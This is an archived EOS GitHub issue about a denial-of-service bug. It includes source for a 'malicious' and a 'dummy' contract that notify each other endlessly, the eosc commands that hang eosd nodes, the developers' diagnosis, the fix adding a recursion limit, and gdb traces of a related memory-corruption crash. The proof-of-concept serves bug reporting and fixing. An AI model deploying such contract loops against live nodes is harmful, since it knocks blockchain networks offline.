This repository has been archived by the owner on Aug 2, 2022. It is now read-only.

DAWN-167 ⁃ eosd dies when there is infinite notifications between two contracts #704

Closed
blockone-syncclient opened this issue Nov 15, 2017 · 27 comments


blockone-syncclient commented Nov 15, 2017

I have developed two contracts to simulate this scenario:

  1. The malicious contract sends a message to the dummy contract as follows:
./eosc push message malicious notify  '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy

The source code is as follows:

void apply_malicious_notify(const TOKEN_NAME::transfer &transfer_msg) {
        eosio::print("From malicious::apply_malicious_notiofy\nGoing to message to ");
        eosio::print(transfer_msg.to);
        eosio::print("\n");
        require_notice(transfer_msg.to);
    }  // namespace TOKEN_NAME

    using namespace TOKEN_NAME;

    extern "C"
    {
    void init() {
        store_account(N(malicious), account(malicious_tokens(1000ll * 1000ll * 1000ll)));
    }

    /// The apply method implements the dispatch of events to this contract
    void apply(uint64_t code, uint64_t action) {
        eosio::print("From malicious::apply\n");
        if (code == N(malicious)) {
            if (action == N(resource))
                TOKEN_NAME::apply_malicious_resource();
            else if (action == N(infinite))
                TOKEN_NAME::apply_malicious_infinite();
            else if (action == N(math))
                TOKEN_NAME::apply_malicious_math();
            else if (action == N(notify))
                TOKEN_NAME::apply_malicious_notify(current_message<TOKEN_NAME::transfer>());
        }
        else if (code == N(dummy)) {
           if (action == N(notify))
                TOKEN_NAME::apply_malicious_notify(current_message<TOKEN_NAME::transfer>());
        }
    }
    }
  2. The dummy contract receives it and sends notifications back to both itself and the malicious contract:
void apply_dummy_notify(const TOKEN_NAME::transfer &transfer_msg) {
        eosio::print("From dummy::apply_dummy_notiofy\n\n");
        require_notice(transfer_msg.from);
        require_notice(transfer_msg.to);
    }  // namespace TOKEN_NAME

    using namespace TOKEN_NAME;

    extern "C"
    {
    void init() {
        store_account(N(dummy), account(dummy_tokens(1000ll * 1000ll * 1000ll)));
    }

    /// The apply method implements the dispatch of events to this contract
    void apply(uint64_t code, uint64_t action) {

        if (code == N(malicious)) {
            eosio::print("From dummy::apply\n");
            if (action == N(notify))
                TOKEN_NAME::apply_dummy_notify(current_message<TOKEN_NAME::transfer>());
        }
    }

When the transaction executes, eosd stops responding and won't be able to generate blocks anymore.

┆Attachments: CMakeLists.txt | CMakeLists (4643a848-7a02-44bd-8214-f2d1f6d6c6d8).txt | dummy.abi | dummy.cpp | dummy.hpp | malicious.abi | malicious.cpp | malicious.hpp


➤ Brian Johnson commented:

(Comment removed, misunderstood the test scenario)


➤ Dhanesh Valappil commented:

Let me simplify the scenario. Contracts A and B are talking to each other:
A sends a message to B.
B receives it and sends a message back to both A and B (i.e., to itself).
When I introduce the code in B to send a message to itself, things get nasty.

For about 3 seconds, B receives a flood of messages. After that, eosd becomes unresponsive and no more blocks are generated.


➤ Brian Johnson commented:

void chain_controller::process_message(const Transaction& trx, AccountName code,
                                       const Message& message, MessageOutput& output,
                                       apply_context* parent_context) {
    apply_context apply_ctx(*this, _db, trx, message, code);
    apply_message(apply_ctx);

    output.notify.reserve( apply_ctx.notified.size() );

    for( uint32_t i = 0; i < apply_ctx.notified.size(); ++i ) {
        try {
            auto notify_code = apply_ctx.notified[i];
            output.notify.push_back( {notify_code} );
            process_message(trx, notify_code, message, output.notify.back().output, &apply_ctx);
        } FC_CAPTURE_AND_RETHROW((apply_ctx.notified[i]))
    }
    ...
}

This means that each recursive call to process_message gets a new apply_context, and therefore a new apply_ctx.notified list, so the two contracts will just keep notifying each other back and forth.

And the code in here will never matter since notified is not carried into the next context:

void apply_context::require_recipient(const types::AccountName& account) {
    if (account == msg.code)
        return;

    auto itr = boost::find_if(notified, [&account](const auto& recipient) {
        return recipient == account;
    });

    if (itr == notified.end()) {
        notified.push_back(account);
    }
}


➤ Brian Johnson commented:

Depending on which use cases we need to accommodate, there are several possible ways to limit this. The easiest one I can think of is imposing a total transaction time limit (right now we only have a per-message time limit).

With the limited time to release, I would like input from [~dan.larimer] and [~admin]


➤ David Moss commented:

[~brian.johnson] Agreed. Please proceed with imposing a total transaction time limit.


➤ Jonathan Giszczak commented:

There is an existing recursion limit for transactions of 4. This is a fundamental aspect of the blockchain, encoded in the genesis block. There is no similar limit for messages. Should we impose the same limit on message recursion or a different limit?


➤ Christian Dunst commented:

I brought this up in a casual conversation and I believe that the solution from Dan was to impose a total limit.

If we don't do this, we could easily write a cascading contract which will bring the bc down.


➤ Dhanesh Valappil commented:

@Christian Dunst, I already wrote a "malicious" contract for exactly this purpose, and it could bring eosd down.


➤ Jonathan Giszczak commented:

[~dhanesh.balakrishnan] Please attach buildable versions of the contracts. I have a possible fix, but need to test it.


➤ Dhanesh Valappil commented:

Attaching two contracts herewith


➤ Dhanesh Valappil commented:

How to test each case:
./eosc push message malicious resource '{"from":"malicious","to":"inita","amount":50}' --scope malicious,inita
./eosc push message malicious infinite '{"from":"malicious","to":"inita","amount":50}' --scope malicious,inita
./eosc push message malicious math '{}' --scope malicious,inita

// the following one simulates endless transaction msgs
./eosc push message malicious notify '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy


➤ Dhanesh Valappil commented:

Works well in the latest build. Here is the test result:
bash-3.2$ ./eosc version client
Build version: 66d23b8
bash-3.2$

bash-3.2$ ./eosc push message malicious notify '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy
3584736ms thread-0 main.cpp:1050 operator() ] Converting argument to binary...
{
"transaction_id": "6fa84c4783f13188f8ff76460f83557a5e627be98e2342e005fb19ca4879f829",
"processed": {
"ref_block_num": 932,
"ref_block_prefix": 3374380092,
"expiration": "2017-11-22T09:00:14",
"scope": [
"dummy",
"malicious"
],
"signatures": [],
"messages": [{
"code": "malicious",
"type": "notify",
"authorization": [],
"data": ""
}
],
"output": [{
"notify": [],
"deferred_trxs": []
}
]
}
}
bash-3.2$


➤ Kevin Heifner commented:

Please get this contract into github and integrated into eosd_run_test.sh so it is run on every commit.


➤ Dhanesh Valappil commented:

Works as expected

bash-3.2$ eosc push message malicious notify '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy
3021720ms thread-0 main.cpp:1050 operator() ] Converting argument to binary...
3023100ms thread-0 main.cpp:1117 main ] Failed with error: 10 assert_exception: Assert Exception
status_code == 200: Error code 400
: {"code":400,"message":"Bad Request","details":"message exhausted allowed resources (3030021)\nMessage processing exceeded maximum inline recursion depth of 4\n\n\n\n\n\n\n\n"}

{"c":400,"msg":"{"code":400,"message":"Bad Request","details":"message exhausted allowed resources (3030021)\nMessage processing exceeded maximum inline recursion depth of 4\n\n\n\n\n\n\n\n"}"}
thread-0 httpc.cpp:113 call

{"server":"10.160.11.221","port":8888,"path":"/v1/chain/push_transaction","postdata":{"ref_block_num":2805,"ref_block_prefix":2023605566,"expiration":"2017-11-23T08:50:51","scope":["dummy","malicious"],"read_scope":[],"messages":[{"code":"malicious","type":"notify","authorization":[],"data":"0000c09a3ae4a29100000000002fa54e3200000000000000"}],"signatures":[]}}
thread-0 httpc.cpp:117 call


➤ Dhanesh Valappil commented:

I am not sure whether it is due to the malicious contract, but node 0 stopped responding after executing the ping-pong messaging between the malicious and dummy contracts:

The last update at eosd is:
testnet@ip-10-160-11-221:~/STAT/build/tn_data_00$ tail -f stderr.txt
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
From malicious::apply(code=malicious)
malicious::apply_malicious_notiofy from : malicious to : dummy
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
3041752ms thread-0 chain_controller.cpp:208 pushblock ] inita #2806 @2017-11-23T08:50:42 | 0 trx, 0 pending, exectime_ms=0
3041752ms thread-0 producer_plugin.cpp:244 block_production_loo ] inita generated block #2806 @ 2017-11-23T08:50:42 with 0 trxs 0 pending
3043084ms thread-0 net_plugin.cpp:558 ~connection ] released connection from client

Log is kept at /home/testnet/STAT/build/tn_data_00/stderr.txt.STAT-167
testnet@ip-10-160-11-221:~/STAT/build/tn_data_00$ hostname
ip-10-160-11-221

Interestingly, the same test works fine on testnet node 1.


➤ Kevin Heifner commented:

Please retest with latest testnet.


➤ Dhanesh Valappil commented:

Specific test passes again:
022467ms thread-0 main.cpp:1125 main ] Failed with error: 10 assert_exception: Assert Exception
status_code == 200: Error code 400
: {"code":400,"message":"Bad Request","details":"message exhausted allowed resources (3030021)\nMessage processing exceeded maximum inline recursion depth of 4\n\n\n\n\n\n\n\n"}

{"c":400,"msg":"{"code":400,"message":"Bad Request","details":"message exhausted allowed resources (3030021)\nMessage processing exceeded maximum inline recursion depth of 4\n\n\n\n\n\n\n\n"}"}
thread-0 httpc.cpp:113 call

{"server":"10.160.11.221","port":8888,"path":"/v1/chain/push_transaction","postdata":{"ref_block_num":1300,"ref_block_prefix":3760663211,"expiration":"2017-11-28T02:17:22","scope":["dummy","malicious"],"read_scope":[],"messages":[{"code":"malicious","type":"notify","authorization":[],"data":"0000c09a3ae4a29100000000002fa54e3200000000000000"}],"signatures":[]}}
thread-0 httpc.cpp:117 call
bash-3.2$

But most of the nodes died.
Node 0

From malicious::apply(code=malicious)
malicious::apply_malicious_notiofy from : malicious to : dummy
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
From dummy::apply(code=malicious)
1033003ms thread-0 chain_controller.cpp:208 pushblock ] inita #1301 @2017-11-28T02:17:13 | 0 trx, 0 pending, exectime_ms=0
1033003ms thread-0 producer_plugin.cpp:244 block_production_loo ] inita generated block #1301 @ 2017-11-28T02:17:13 with 0 trxs 0 pending
1044022ms thread-0 net_plugin.cpp:1737 handle_message ] received forking block #1299
1045404ms thread-0 net_plugin.cpp:560 ~connection ] released connection from client
1076836ms thread-0 net_plugin.cpp:554 connection ] accepted network connection
1153162ms thread-0 net_plugin.cpp:554 connection ] accepted network connection
1167054ms thread-0 net_plugin.cpp:1262 operator() ] Error reading message from connection: End of file
1167056ms thread-0 net_plugin.cpp:833 operator() ] Error sending message: Broken pipe
1173995ms thread-0 net_plugin.cpp:560 ~connection ] released connection from client

Node 1
99003ms thread-0 chain_controller.cpp:208 pushblock ] initg #1297 @2017-11-28T02:16:39 | 0 trx, 0 pending, exectime_ms=0
1000003ms thread-0 chain_controller.cpp:208 pushblock ] initl #1298 @2017-11-28T02:16:40 | 0 trx, 0 pending, exectime_ms=0
1005004ms thread-0 chain_controller.cpp:208 pushblock ] initb #1299 @2017-11-28T02:16:45 | 0 trx, 0 pending, exectime_ms=0
1005004ms thread-0 producer_plugin.cpp:244 block_production_loo ] initb generated block #1299 @ 2017-11-28T02:16:45 with 0 trxs 0 pending
1011611ms thread-0 net_plugin.cpp:1737 handle_message ] received forking block #1299
1012009ms thread-0 chain_controller.cpp:144 pushblock ] Switching to fork: 000005147bff31f7ab2a27e056da217ce3b47e89a533533e547c123fa9858e0d
1012009ms thread-0 chain_controller.cpp:153 pushblock ] pushing blocks from fork 1299 00000513ecd99dc35dafb943f03a56f528d999cb4f0edf740b04e6f413082af6
1012010ms thread-0 chain_controller.cpp:153 pushblock ] pushing blocks from fork 1300 000005147bff31f7ab2a27e056da217ce3b47e89a533533e547c123fa9858e0d


➤ Brian Johnson commented:

Just pulling the execution command out so it's easier to see (the comment window may add line breaks):

eosc push message malicious notify '{"from":"malicious","to":"dummy", "amount":50}' --scope malicious,dummy


➤ Kevin Heifner commented:

config.ini additions for testnet:

block-interval-seconds = 5
pending-txn-depth-limit = 50


➤ Kevin Heifner commented:

Running a 4-producer mesh network with a 1-second default block time. I ran tests/eosd_run_test.sh and the eosds all pegged the CPU and spiked memory usage. I was able to connect to one of the eosds and got this stack trace:

(gdb) where
#0 0x00007fb394d343c0 in __libc_recvmsg (fd=15, msg=0x7ffd86ebb490, flags=0) at ../sysdeps/unix/sysv/linux/recvmsg.c:28
#1 0x0000000000bc85ea in boost::asio::detail::socket_ops::recv (s=15, bufs=0x7ffd86ebb508, flags=0, count=, ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/socket_ops.ipp:784
#2 boost::asio::detail::socket_ops::non_blocking_recv (s=15, bufs=, count=, flags=, is_stream=, ec=..., bytes_transferred=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/socket_ops.ipp:873
#3 0x0000000000bc855e in boost::asio::detail::reactive_socket_recv_op_base<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > >::do_perform (base=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_recv_op.hpp:55
#4 0x0000000000af0ffd in boost::asio::detail::reactor_op::perform (this=0x4a58e80) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactor_op.hpp:40
#5 boost::asio::detail::epoll_reactor::start_op (this=0x48a0020, op_type=, descriptor=, descriptor_data=@0x48e4978: 0x4910c00, op=0x4a58e80, is_continuation=,
allow_speculative=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/epoll_reactor.ipp:242
#6 0x0000000000af0d18 in boost::asio::detail::reactive_socket_service_base::start_op (this=0x48e4248, impl=..., op_type=0, op=0x4a58e80, is_continuation=,
is_non_blocking=, noop=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/reactive_socket_service_base.ipp:213
#7 0x0000000000ab95f5 in boost::asio::detail::reactive_socket_service_base::async_receive<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::reactive_socket_service_base::base_implementation_type&, std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, int, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&) (flags=0,
this=, impl=..., buffers=..., handler=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_service_base.hpp:287
#8 boost::asio::stream_socket_serviceboost::asio::ip::tcp::async_receive<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::reactive_socket_serviceboost::asio::ip::tcp::implementation_type&, std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, int, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&&) (flags=0,
this=, impl=..., buffers=..., handler=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/stream_socket_service.hpp:361
#9 boost::asio::basic_stream_socket<boost::asio::ip::tcp, boost::asio::stream_socket_serviceboost::asio::ip::tcp >::async_read_some<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&&) (this=, buffers=..., handler=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/basic_stream_socket.hpp:844
#10 eosio::net_plugin_impl::start_read_message (this=, conn=...) at /home/heifnerk/ext/eos/plugins/net_plugin/net_plugin.cpp:1289
#11 0x0000000000ae2ad9 in eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7::operator()(boost::system::error_code, unsigned long) const (bytes_transferred=, this=, ec=...)
at /home/heifnerk/ext/eos/plugins/net_plugin/net_plugin.cpp:1320
#12 boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>::operator()() (this=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/bind_handler.hpp:127
#13 boost::asio::asio_handler_invoke<boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long> >(boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>&, ...) (function=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/handler_invoke_hook.hpp:69
#14 boost_asio_handler_invoke_helpers::invoke<boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>&, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&) (function=...,
context=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/handler_invoke_helpers.hpp:37
#15 boost::asio::detail::reactive_socket_recv_op<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>::do_complete(boost::asio::detail::task_io_service*, boost::asio::detail::task_io_service_operation*, boost::system::error_code const&, unsigned long) (owner=, base=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_recv_op.hpp:110
#16 0x00000000009735e7 in boost::asio::detail::task_io_service_operation::complete (this=, owner=..., ec=..., bytes_transferred=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/task_io_service_operation.hpp:38
#17 boost::asio::detail::task_io_service::do_run_one (this=0x489ec50, lock=..., this_thread=..., ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/task_io_service.ipp:372
#18 0x0000000000973201 in boost::asio::detail::task_io_service::run (this=0x489ec50, ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/task_io_service.ipp:149
#19 0x000000000097176c in boost::asio::io_service::run (this=0x489ebe0) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/impl/io_service.ipp:59
#20 appbase::application::exec (this=0x283fa28 appbase::application::instance()::_app) at /home/heifnerk/ext/eos/libraries/appbase/application.cpp:186
#21 0x0000000000969628 in main (argc=4, argv=0x7ffd86ebc158) at /home/heifnerk/ext/eos/programs/eosd/main.cpp:42


➤ Bart Wyatt commented:

That callstack really looks like the message_buffer was destroyed and then a call into the io_service message pump still wrote to it. Given that the message_buffer is owned by the connection, and we have already seen issues where the connection is destroyed while asio calls are outstanding, this doesn't surprise me.

We should probably audit all the lifetimes in that code asap. At the very least, the handler lambda should manage the lifetime of the buffers passed into async_read_some.

The nuclear option is to have the lambda capture a shared_ptr to the connection but as we have no hard guarantees about when that lambda fires it makes the lifetime of our connection object harder for us to track. So, first option is to see if we can get a handle on all the things that may be used outside the lifetime of the connection. We fixed many yesterday, hopefully the message_buffer is part of a short list.


➤ Kevin Heifner commented:

With the latest from Paul on the morning of 11/30/2017:

#0 0x00007fa5077c8377 in __libc_recvmsg (fd=17, msg=0x7ffdece2a470, flags=0) at ../sysdeps/unix/sysv/linux/recvmsg.c:28
#1 0x0000000000ba527a in boost::asio::detail::socket_ops::recv (s=17, bufs=0x7ffdece2a4e8, flags=0, count=, ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/socket_ops.ipp:784
#2 boost::asio::detail::socket_ops::non_blocking_recv (s=17, bufs=, count=, flags=, is_stream=, ec=..., bytes_transferred=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/socket_ops.ipp:873
#3 0x0000000000ba51ee in boost::asio::detail::reactive_socket_recv_op_base<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > >::do_perform (base=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_recv_op.hpp:55
#4 0x0000000000acdc8d in boost::asio::detail::reactor_op::perform (this=0x34f9ad0) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactor_op.hpp:40
#5 boost::asio::detail::epoll_reactor::start_op (this=0x3310010, op_type=, descriptor=, descriptor_data=@0x334f2e8: 0x335ba70, op=0x34f9ad0, is_continuation=, allow_speculative=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/epoll_reactor.ipp:242
#6 0x0000000000acd9a8 in boost::asio::detail::reactive_socket_service_base::start_op (this=0x334a4f8, impl=..., op_type=0, op=0x34f9ad0, is_continuation=, is_non_blocking=, noop=)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/reactive_socket_service_base.ipp:213
#7 0x0000000000a962a5 in boost::asio::detail::reactive_socket_service_base::async_receive<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::reactive_socket_service_base::base_implementation_type&, std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, int, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&) (flags=0, this=, impl=..., buffers=..., handler=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_service_base.hpp:287
#8 boost::asio::stream_socket_serviceboost::asio::ip::tcp::async_receive<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::reactive_socket_serviceboost::asio::ip::tcp::implementation_type&, std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, int, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&&) (flags=0, this=, impl=..., buffers=..., handler=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/stream_socket_service.hpp:361
#9 boost::asio::basic_stream_socket<boost::asio::ip::tcp, boost::asio::stream_socket_serviceboost::asio::ip::tcp >::async_read_some<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer > const&, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&&) (this=, buffers=..., handler=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/basic_stream_socket.hpp:844
#10 eosio::net_plugin_impl::start_read_message (this=, conn=...) at /home/heifnerk/ext/eos/plugins/net_plugin/net_plugin.cpp:1296
#11 0x0000000000abf769 in eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7::operator()(boost::system::error_code, unsigned long) const (bytes_transferred=, this=, ec=...) at /home/heifnerk/ext/eos/plugins/net_plugin/net_plugin.cpp:1327
#12 boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>::operator()() (this=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/bind_handler.hpp:127
#13 boost::asio::asio_handler_invoke<boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long> >(boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>&, ...) (function=...)
at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/handler_invoke_hook.hpp:69
#14 boost_asio_handler_invoke_helpers::invoke<boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>(boost::asio::detail::binder2<eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7, boost::system::error_code, unsigned long>&, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7&) (function=..., context=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/handler_invoke_helpers.hpp:37
#15 boost::asio::detail::reactive_socket_recv_op<std::vector<boost::asio::mutable_buffer, std::allocatorboost::asio::mutable_buffer >, eosio::net_plugin_impl::start_read_message(std::shared_ptreosio::connection)::$_7>::do_complete(boost::asio::detail::task_io_service*, boost::asio::detail::task_io_service_operation*, boost::system::error_code const&, unsigned long) (
owner=, base=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/reactive_socket_recv_op.hpp:110
#16 0x000000000095f8c7 in boost::asio::detail::task_io_service_operation::complete (this=, owner=..., ec=..., bytes_transferred=) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/task_io_service_operation.hpp:38
#17 boost::asio::detail::task_io_service::do_run_one (this=0x330ec40, lock=..., this_thread=..., ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/task_io_service.ipp:372
#18 0x000000000095f4e1 in boost::asio::detail::task_io_service::run (this=0x330ec40, ec=...) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/detail/impl/task_io_service.ipp:149
#19 0x000000000095da4c in boost::asio::io_service::run (this=0x330ebd0) at /home/heifnerk/ext/boost/boost_1_64_0/include/boost/asio/impl/io_service.ipp:59
#20 appbase::application::exec (this=0x280fa28 appbase::application::instance()::_app) at /home/heifnerk/ext/eos/libraries/appbase/application.cpp:186
#21 0x0000000000955908 in main (argc=4, argv=0x7ffdece2b138) at /home/heifnerk/ext/eos/programs/eosd/main.cpp:42


➤ Kevin Heifner commented:

I think we have a fix for the memory corruption issue. Creating PR for it now. Chasing a spam message send now.


➤ Corey Lederer commented:

[~dhanesh.balakrishnan] Can you please re-test with the examples you gave above? We believe this should be fixed.


➤ Corey Lederer commented:

Moving to finished; this was moved to closed-withdrawn by mistake.

@chenlian2015

"Your email address chenlian2025@gmail.com doesn't have access to blockone.atlassian.net
We've all got more than one email address these days - are you using the right one?
If you're certain you should have access with chenlian2025@gmail.com, contact your administrator."

Could you grant me access?

@coreylederer

@chenlian2015: blockone.atlassian.net is a private repository which is not available to the public.

spoonincode referenced this issue Dec 8, 2017: "stat 167 gh 704 read buffer safety" (branch …r-safety, reapplied on noon branch)
heifner added a commit that referenced this issue Jan 4, 2018
heifner added a commit that referenced this issue Jan 4, 2018
(cherry picked from commit f5e316d)
blockone-syncclient changed the title from "STAT-167 ⁃ eosd dies when there is infinite notifications between two contracts" to "DAWN-167 ⁃ eosd dies when there is infinite notifications between two contracts" Jan 16, 2018